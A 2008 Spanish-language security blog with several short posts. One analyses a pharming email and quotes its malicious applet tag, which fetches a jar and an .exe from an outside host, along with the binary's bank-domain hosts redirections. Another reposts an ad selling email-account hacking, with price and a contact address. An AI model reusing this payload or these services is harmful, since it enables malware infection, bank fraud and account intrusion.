Weblog de JaCkSecurity

Si vas a alojar tu web en una granja de servidores dedicada a hospedar otras, es recomendable solicitar al proveedor el aseguramiento de la LAN vía directivas estrictas de protección contra envenenamiento de tabla ARP.

El amago de secuestro que le procuraron a la web de Metasploit es un ejemplo claro de la situación. Así, que ya sabe qué pedirle de nuevo a su proveedor de hosting y colocation para estas fiestas patrias que se acercan.

Javier Romero, CTO
JaCkSecurity
Conocimiento, Conciencia y Consultoría

Este post va dedicado para aquellos usuarios de Windows que aún no quieren dejar de usar privilegios altos en sus estaciones mientras navegan.

Según Microsoft existiría una nueva amenaza combinada para quienes hayan instalado el navegador de Apple en sus Windows. Al parecer, Safari permitiría silenciosamente la instalación de cualquier ejecutable que así se lo pida desde alguna página maliciosa, cuando corre en Windows.

Quien sino -especialmente- los más geek han probado Safari en sus Windows, seguramente para tener la ligera sensación de una Apple, o para experimentar de la velocidad de ejecución de este navegador, además de otras cosas.

A ellos, los especialistas de seguridad de Microsoft les recomiendan la desintalación y no uso de Safari en sus sistemas Windows (XP y Vista) hasta que Apple o Microsoft mismo resuelvan esta debilidad, que los amenaza por usar Safari.

Si el mensaje no es claro, no importa, porque la misma empresa Microsoft pone -tal si fuera premio consuelo- la salvedad que aún no han observado explotación activa de esta debilidad en la red.

No nos engañemos, la seguridad es un estado mental que todos debemos combatir día a día con noticias como esta, especialmente cuando se tiene algo de Apple (de quienes la consideran segura) en una Windows (de quienes lo consideran la más insegura).

Mucho cuidado, usted está advertido.

Staff
JaCkSecurity
Conocimiento, Conciencia, Consultoría

JaCkSecurity ha documentado un pharming que recibiese el martes 13 mayo 2008 (Tue, 13 May 2008 19:02:28 -0400)

EVIDENCIA PRINCIPAL

To: javier@jacksecurity.com
Subject: Video parodia de Tula Rodriguez y su embarazo
From: Maria Isabel

Hola;
Maria te recomienda la siguiente noticia: Video Parodia (burla) de Tula Rodriguez y su embarazo
URL: http://club-classic.nl/noticias/Video_parodia_de_Tula_Rodriguez_y_su_embarazo.html
Mira este video je je, se aprecia a una joven que imita a Tula al mejor estilo de una artista cómica
y cuenta de manera sarcástica el momento de la inusual confesión.
Esperamos que sea de tu agrado.
Saludos,

Análisis principal

Invocación maliciosa:
< a p p l e t name="link" code="Inicio.class" archive="http://boardpix.com/lehigh/content/Crow/ link . jar" height="10" width="1"> < p a r a m name="url" value="http : // boardpix . com /lehigh/content/Crow/xxxxxxxx.exe"> < / applet >

Análisis del binario que trata de instalarse sigilosamente:

http://www.threatexpert.com/report.aspx?md5=d010e2779c2a175ada1d9a548654bbfe

Datos del archivo referido dentro del binario:
72.249.25.219 viabcp.com
72.249.25.219 http://viabcp.com
72.249.25.219 www.viabcp.com
72.249.25.219 pagum.com
72.249.25.219 http://pagum.com
72.249.25.219 www.pagum.com
72.249.25.219 peb1.bbvanetlatam.com

Servidores de terceros afectados en el pharming:
club-classic.nl (donde se aloja la trampa visual)
boardpix.com (donde se aloja el binario)
no-problem.com.mx (donde se aloja las direcciones IP referidas por el binario)

Cabecera del correo original

From – Tue May 13 18:02:58 2008
X-Account-Key: account2
X-UIDL: UID17353-1168226604
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
X-Mozilla-Keys:
Return-path:
Envelope-to: javier@jacksecurity.com
Delivery-date: Tue, 13 May 2008 19:02:37 -0400
Received: from jsadmin by a2s5.a2hosting.com with local-bsmtp (Exim 4.68)
(envelope-from )
id 1Jw3Vs-00025y-Uy
for javier@jacksecurity.com; Tue, 13 May 2008 19:02:37 -0400
X-Spam-Checker-Version: SpamAssassin 3.2.3 (2007-08-08) on a2s5.a2hosting.com
X-Spam-Level: **
X-Spam-Status: No, score=2.8 required=5.0 tests=HTML_MESSAGE,
HTML_MIME_NO_HTML_TAG,MIME_HTML_ONLY,RDNS_NONE autolearn=disabled
version=3.2.3
Received: from [74.53.114.5] (helo=demodocus.site5.com)
by a2s5.a2hosting.com with esmtps (TLSv1:AES256-SHA:256)
(Exim 4.68)
(envelope-from )
id 1Jw3Vs-00025g-EC
for javier@jacksecurity.com; Tue, 13 May 2008 19:02:28 -0400
Received: from idham by demodocus.site5.com with local (Exim 4.68)
(envelope-from )
id 1Jw3Vd-00032t-Iv
for javier@jacksecurity.com; Tue, 13 May 2008 18:02:13 -0500
To: javier@jacksecurity.com
Subject: Video parodia de Tula Rodriguez y su embarazo
From: Maria Isabel
Content-type: text/html
MIME-Version: 1.0rn
Message-Id:
Date: Tue, 13 May 2008 18:02:13 -0500
X-AntiAbuse: This header was added to track abuse, please include it with any abuse report
X-AntiAbuse: Primary Hostname – demodocus.site5.com
X-AntiAbuse: Original Domain – jacksecurity.com
X-AntiAbuse: Originator/Caller UID/GID – [33075 501] / [47 12]
X-AntiAbuse: Sender Address Domain – demodocus.site5.com
X-Source: /usr/bin/php
X-Source-Args: /usr/bin/php indexx.php
X-Source-Dir: khairilidham.com:/public_html/content

Enlaces de terceros que fueron usados:

http://www.elgonzi.com/2008/05/video-parodia-de-tula-rodriguez-y-su.html

http://www.youtube.com/watch?v=Q4QwiLk183o

Staff
JaCkSecurity
Conocimiento, Conciencia y Consultoría

Posiblemente, lo único de particular que tiene Kraken sea el hecho de haber cubierto varios medios noticiosos del Internet, en sólo una semana.

Tal parece que la moda de hoy (2008) es hablar de botnets nuevas, categorizadas no por su peligrosidad, ni ferocidad, sino por su tamaño (400,000 PCs en el caso de Kraken, que es comparada con Storm Worm de 200k), muy contrario a lo que en el pasado se hacía con los virus, donde sólo valía su peligrosidad, y a veces hasta su rápidez mediática, para convertirlas en noticia.

Sin embargo, como en todo, la verdad pocas veces noticia. Las botnets -en realidad- son cuantiosas en todo el mundo, pero con un pequeño número de zombis. Un mismo atacante puede manejar varias botnets, todas ellas, pequeñas en población. El negocio está en no ser detectado, no en ser detectado. Por esa razón, nace la suspicacia de quiénes son -en realidad- los que crean estas botnets “supuestamente grandes”.

Como sea, esta es una prueba más que los virus son historia: ¿acaso no también los antivirus?

Para su curiosidad de Kraken, lea más este blog.

Javier Romero
JaCkSecurity, CTO
Conocimiento, Conciencia y Consultoría

Interesante anuncio web (Ya existe una forma de satisfacer a esa audiencia que anda ambrienta de delinquir):

hackeo msn yahoo gmail hotmail
Localización: Lima
Fecha: 29-02-2008
Teléfono: 0188193136

Contactar Anunciante
Visitas: 42
Hackeo msn
cada día son mas la gente que dice saber sacar contraseñas de correo , asi que comprendo a quienes no quieran creerme .

mi sistema de trabajo funciona así.
usted me dice la cuenta que quiere hackear ….
yo procedo a realizar el trabajo y en cuanto tengo la contraseña (no mas de 2 días) ,

le doy las pruebas suficientes para recién cobrar , antes no cobramos nada ,
además de vender contraseñas , podemos también darte las conversaciones (anteriores)de MSN entre 2 correos que tu nos indiques. Por un precio adicional podemos darte mas datos como información física del PC . Capturar su computadora y gravar todo cuanto se haga o diga desde su PC.
nuestro servicio es nuevo y no te hacemos perder el tiempo ni tu dinero, solo pagas cuando te mostramos el mail hackeado , para poder contactarnos solo escribe a cleber_leo2@hotmail.com, y cuéntanos tu caso . nosotros nos encargamos de ofrecerte las posibles soluciones y logramos resolverlo ..asta el final ..es un servicio personal ..
el servicio es totalmente confidencial y anónimo , en ningún momento la victima podrá notar que tu estas vigilando su correo , el programa es nuestro (creado por nosotros)y solo necesitas los password de las personas que quieras ver sus
conversaciones.
te invitamos a contactarnos . solo pedimos seas una persona seria y responsable , recuerda que también ayudamos en caso muy delicados (infidelidad , secuestros , suplantación de identidad , engaños , usurpación , etc.)
condiciones .

1 No es un servicio gratuito
2 bajo ninguna condición enviamos ningún tipo de contraseña asta no recibir el pago
3 no cobramos nada por intentar hackear la cuenta
4 no cambiamos el password , te doy el password original
5 el costo es de 50 dólares por cada cuenta y 60 dólares por el programa para ver las conversaciones de msn sin que se den cuenta
6 es totalmente anónimo.
7 no es necesario que la victima visite su correo, nosotros trabajamos en un nivel superior
8 el plazo máximo para los password es de 2 días
9 el único mail de contacto es cleber_leo2@hotmail.com

ayacucho perú 2008

La semana pasada recibimos una llamada de un cliente nuestro, en el que se nos informara de la falla en la resolución de dominio del sitio web de la Policía Informática. Hasta allí, no creíamos que pudiera significar mayor problema que no pudiera resolver la DIRINCRI o el auspiciador de su dominio y sitio web, el cual tampoco responde, por una falla aparentemente diferente. No obstante, luego de ver lo que le sucedió al sitio web del Scotland Yard (véa más abajo), era importante denunciar y/o advertir el posible riesgo al que pudiera estar expuestos aquellos ciber-ciudadanos -más neófitos- que fueran conocedores del sitio web www . policiainformatica . gob . pe (Copia en 4law).

Debido a la advertencia legal en el sitio web www.nic.pe, no es posible colgar el pantallazo donde se indica la no existencia del dominio citado, como para perpetuar este post.

Por otro lado, un colega y alumno de esa entidad ya fue notificado para ponernos al corriente de cualquier cambio y solución pronta que se dé a este problema.

La única URL disponible pero sin información oportuna es la citada por ahora en la web de PNP.

Tome especial cuidado de este aviso no lo subestime. En uno de los últimos post del auspiciador de la citada web, el autor retó a los crackers limeños y amigos de cracker CiberAlexis a que lo hackeen.

Idealmente la mejor recomendación para no terminar visitando el sitio web de algún cracker -enemigo de la Policía Informática (DIRINCRI) y enemigo del auspiciador (citado arriba), sería el enlazar a través de los recursos de la web oficial de la PNP cuyo URL es: http://www.pnp.gob.pe/enlaces.html, PERO, por el momento, eso podría ser igual de terrible, debido a que la misma página sigue apuntando a la web que no responde (www . policiainformatica . gob . pe)

Visíte nuestro blog, en cuanto tengamos más información, y le proveeremos el nuevo recurso web de la DIRINCRI.

Staff
JaCkSecurity
Conocomiento, Conciencia, Consultoría

Según el diario Peru.21, la repentina falla de energía que sufrió varios distritos de Lima (Perú), el pasado 9 de enero, se debió a la paralización de la planta de Camisea. Las dos compañías proveedoras de energía, como es Edelsur y Edelnor, tuvieron que desabastecer de energía a varias viviendas, debido a que parte del suministro se obtiene gracias a turbinas que aprovechan el gas de Camisea, y no el de las centrales hidroeléctricas del Perú.

En el caso de Edelnor, se sabe que la falla se complicó aún más cuando una de las dos turbinas que operan a gas, no pudo conmutar a diesel.

Aunque la noticia señala que el corte fue hacia viviendas, sabemos bien que los afectados no fueron sólo urbanizaciones habitacionales, lo que complicó las operaciones corrientes en más de un negocio, excepto aquellos que tuvieron algún plan de contingencia.

No obstante, nos preguntamos, si sería posible que la coincidencia desfavorezca tanto, al punto de producirse una falla en paralelo a las centrales hidroeléctricas (cualquiera de sus diversos puntos críticos en ella) y a la planta de producción de gas natural que ahora sabemos abastece a las empresas proveedoras de energía. ¿Dos fallas en paralelo? No es nada desquiciado, las fallas en paralelo son posibles (piense: falla la planta de gas, y falla la turbina que intentó conmutar a diesel).

Javier Romero
JaCkSecurity, CTO

Esta es una idea terrorífica, pero finalmente un riesgo potencial. Imagine que un día alguien o algo logre que cada nuevo producto manufacturado en China logre salir con un malware incorporado antes de dejar la planta. Imagine el potencial egemónico que esto daría al villano que logre penetrar las plantas de manufactura de los appliances, gadgets y todo objeto que se conecte a las PCs del mundo. ¿Es esto acaso una idea para sembrar terror?

La respuesta es no. En días pasados, los incident-handlers del ISC aseguran haber recibido reportes de equipos USB, específicamente de cuadro de fotografías conectables vía USB. Puede ver los detalles de los errores que hace de esta sospecha de malwares en estos dispositivos en la web del ISC.

Sin embargo, no sólo los usuarios son los que deben estar alerta a esta realidad. En realidad es un problema potencial para todos, organizaciones manufactureas, aduaneras, retailers y gobiernos. Este riesgo puede convertirse en una poderosa herramienta para iniciar una ciberguerra silenciosa, o aún peor, para golper con propaganda negativa al país manufacturero más importante del mundo. El riesgo daña a muchos, y aún a quien menos se piensa.

Mucho cuidado, todos debemos estar alerta. Recuerde casi todo es manufacturado en China, y casi toda la propaganda contra China es generada en occidente, todo, excepto “nuestros ojos y nuestras mentes”.

Javier Romero
JaCkSecurity, CTO
conocimiento, conciencia y consultoria